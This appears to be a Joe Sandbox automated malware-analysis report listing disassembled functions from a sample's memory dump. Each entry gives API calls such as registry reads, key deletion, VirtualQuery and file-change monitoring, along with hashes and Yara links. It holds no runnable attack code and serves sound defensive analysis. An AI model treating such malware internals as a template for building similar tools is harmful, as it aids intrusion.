                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              • Opcode ID: 97820563184b13ee9ddbfbc95b756bbfe1f1840d3638df2e064d7636be1f040f
                                                                                                                                                                                                              • Instruction ID: 82f58c5b1d7a4e1677e3961797c8860a1497c2ceb0972f6cb5a75055f1277dae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97820563184b13ee9ddbfbc95b756bbfe1f1840d3638df2e064d7636be1f040f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB01483661122197D7307F99AC58E96BB6CDBC8B72F25412DE745D3204C7705900D7D0
                                                                                                                                                                                                              Function 012E3830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E3864
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,9e2b3eb7a,00000000,?,00000000,?), ref: 012E3885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E3893
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 9e2b3eb7a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-3208106814
                                                                                                                                                                                                              • Opcode ID: ce1841e84883a1b6a623b1ad555af4cf4b002c7964b14a2df10689b02da1d7bc
                                                                                                                                                                                                              • Instruction ID: 6f8c27eaa6a3c554ba01acba20d4891a5663ed5fa077d5eeeaac175bdb480e7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce1841e84883a1b6a623b1ad555af4cf4b002c7964b14a2df10689b02da1d7bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F0CD75A40209FBEB10DF95CD49FEE77B8BB04705F50419DEA05E7280D77597048B94
                                                                                                                                                                                                              Function 012F4120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012F1163,00001000), ref: 012F412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,012F1163,00001000), ref: 012F413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform,?,012F1163,00001000), ref: 012F414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 17d5df57c8cafe9765cc92a9c5e1e07eb3bc252442fa56757117237527d5195b
                                                                                                                                                                                                              • Instruction ID: e088b0d73e00c689966d885aef4e0efc865492d4a61c2a63b46621d735e8586f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17d5df57c8cafe9765cc92a9c5e1e07eb3bc252442fa56757117237527d5195b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99E01A747803159FEB30BF76A80BE573BADBB56B48B44883DE616D9205DBB0D6108760
                                                                                                                                                                                                              Function 012F43D0 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F43D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F44DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 863b041c5cca2a8a7694c38cb5efcbd2840f2ce11bd2e401e8d6f28b08513874
                                                                                                                                                                                                              • Instruction ID: 9d0946821204822918490f96bf934f16081805148b6efe3aeaecc2e4de33ca41
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 863b041c5cca2a8a7694c38cb5efcbd2840f2ce11bd2e401e8d6f28b08513874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F410C70D11219AFDB10DFA9D884AEEBBF5FB48310F14852EEA15F7240D7B4A9408F91
                                                                                                                                                                                                              Function 012F4500 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F4509
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F453C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4568
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F458F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F460D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: b93221028b303fdcb3c011c240a9dfc4f6ea8b245cac0c0169867b77463bd659
                                                                                                                                                                                                              • Instruction ID: 7c5c14545b331c0c9f3da58859f471aaa1afa26c82781271553f48d9778018e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93221028b303fdcb3c011c240a9dfc4f6ea8b245cac0c0169867b77463bd659
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D841F1B0D11219DFDB11EFA9D884AEEBBF5FB48710F10852EE614E7240D7B4A9408F91
                                                                                                                                                                                                              Function 012FAAA0 Relevance: 7.6, APIs: 6, Instructions: 106memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,012F13D9,00000000,00000000,?), ref: 012FAACC
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295BC,?,set_url ,?,012F1A39), ref: 012FAAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,012F1A39), ref: 012FAB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,012F1A39), ref: 012FAB78
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000012,?,?,?,?,?,012F1A39), ref: 012FAB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,012F1A39), ref: 012FAB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              • Opcode ID: 35c66e7a86d45cebaa5c8bbd71bb849383c3c603bc43890427727d8dc7751666
                                                                                                                                                                                                              • Instruction ID: fd73d1052ea52c3bb22a1334b9ad7d4e695b92fa08fc1878f38a8056d8e56200
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35c66e7a86d45cebaa5c8bbd71bb849383c3c603bc43890427727d8dc7751666
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6431E97291021A5BE7324E2CD884BAAFF9F9F65254F18893DEF4EC7205F621D9058390
                                                                                                                                                                                                              Function 012F42A0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F42A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F42DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F43AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 65c01f112f61b9aa45becb2c1ead1120959e51b8a0132c03a73e7d91df24daca
                                                                                                                                                                                                              • Instruction ID: 32e7d864d679d9db03b5652e39097be69da94c22e5cc362b5c956d8f55060583
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65c01f112f61b9aa45becb2c1ead1120959e51b8a0132c03a73e7d91df24daca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841FC70D10219DFDB10DFA9D884AAEBBF5FF48710F24842EE614E7244D7B499408F91
                                                                                                                                                                                                              Function 012E13B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E13DE
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E1446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E1498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 087821c19e6e9689c94ef8e2ae0f23e23603b7e4ce82a974bce2ed0dc77a6b07
                                                                                                                                                                                                              • Instruction ID: bdd143881b9eb65e4bc55ca9f014d9e52235e8eaff9deb02e1dbac8ec175a1ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 087821c19e6e9689c94ef8e2ae0f23e23603b7e4ce82a974bce2ed0dc77a6b07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A531CDB1D11209AFDB40DFA8D885AEE7BF9FB4C314F50452AE918E7240E37499418F90
                                                                                                                                                                                                              Function 012F9530 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F9539
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F956C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F9598
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F95BF
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F95EE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 0e13fb68abb05c176a14a81ac22a453a259d21e214e7eb08eb1cf67b35b4c2a9
                                                                                                                                                                                                              • Instruction ID: c428189abc4ae0f79f7b696e6a6f6701343286cf815d08f94562ef64b6a9eb76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e13fb68abb05c176a14a81ac22a453a259d21e214e7eb08eb1cf67b35b4c2a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531DAB1D11219AFDF40DFA8D885AEEBBF9FB48714F11812AE908E7200E77499418F90
                                                                                                                                                                                                              Function 01308D50 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,01309234), ref: 01308D83
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,01309234), ref: 01308DAB
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,01309234), ref: 01308DD5
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,01309234), ref: 01308DE3
                                                                                                                                                                                                              • FileTimeToDosDateTime.KERNEL32(?,01309234,?,?,?,?,?,?,?,?,01309234), ref: 01308DF5
                                                                                                                                                                                                                • Part of subcall function 01308890: GetFileType.KERNEL32(?,00000000,00000000), ref: 01308899
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 60630809-0
                                                                                                                                                                                                              • Opcode ID: 6c3d55e371c6b4462cad13488781f6fccbae12a4f61fc326c5dbe7a911f1587b
                                                                                                                                                                                                              • Instruction ID: abddd1a41ccde4b52e94a1d79f7c32d4e7efd8660e02d8bd9a6e551d5399b316
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c3d55e371c6b4462cad13488781f6fccbae12a4f61fc326c5dbe7a911f1587b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89214FB29007449FC731DFA9D9C48ABFBF8FB48314B500A6EE69AC2A40D771B544CB60
                                                                                                                                                                                                              Function 013051F0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,012F369B,00000000,00010108,?,00000000), ref: 0130522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 01305264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0130528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,012F369B), ref: 013052A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 013052B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              • Opcode ID: b324484a7df48b715d0734d297700f2ef66d7cc214c9b1bc1b3cd97b7ec6ba46
                                                                                                                                                                                                              • Instruction ID: 01188caab43096241eb45565816fc7c3b047804c886bbb968f7c9db571813bc3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b324484a7df48b715d0734d297700f2ef66d7cc214c9b1bc1b3cd97b7ec6ba46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D21A136A00219ABDB31EE9CDC54FEAB7ACEF54714F048195FD40EB284D6B0AE448BD0
                                                                                                                                                                                                              Function 012E5940 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5962
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5995
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E59C1
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E59E8
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5A04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 87b8bac8f52757e26ac49459155639460c2b98fa7933f568481e6fb33ccd2770
                                                                                                                                                                                                              • Instruction ID: bc636ba46c06af645837b3d762ed89b70ce14d56bc732a747a405d9ac16de6ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87b8bac8f52757e26ac49459155639460c2b98fa7933f568481e6fb33ccd2770
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E831AAB5D1120DAFDB40DFA9D885AEEBBF5FB48304F50446AE914E7240E7749A008F91
                                                                                                                                                                                                              Function 012E18B0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(012E682B,012E6829,012E682A,012E682A,6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9), ref: 012E18EF
                                                                                                                                                                                                              • free.MSVCRT(012E6829), ref: 012E1918
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E1923
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,012E6829), ref: 012E1933
                                                                                                                                                                                                              • free.MSVCRT(012E6829), ref: 012E1953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
                                                                                                                                                                                                              • Opcode ID: 89ca19d79d846dc3f32f6ae642cc093274b5a827a460eaff79ae230b6b0b338d
                                                                                                                                                                                                              • Instruction ID: 6813dbebaca6501c13d755347f8430c1e10c914a886883716c2197581d8f9c7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ca19d79d846dc3f32f6ae642cc093274b5a827a460eaff79ae230b6b0b338d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA2181B161020A9FD724DF59D4C4B6ABBE8FF59300F54893CEA4AC7300D771A560CB91
                                                                                                                                                                                                              Function 012F8080 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 012F80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 012F8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 012F8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 012F812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 012F8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: 98a3c90aacc0f8951fdfcc5b0a78d109d29c9adbc56bd12eb7a555d21b6204e4
                                                                                                                                                                                                              • Instruction ID: d6fc79344b671042600d4bdea5dbb76ffb1e87d1f3f763398994502ffe2ea5af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98a3c90aacc0f8951fdfcc5b0a78d109d29c9adbc56bd12eb7a555d21b6204e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A721D83042021AD7DB219B689C59BEBFBE86F12300F1446BDDB51D7280DBB0DA44CFA5
                                                                                                                                                                                                              Function 01308C10 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000,?), ref: 01308C37
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C57
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C68
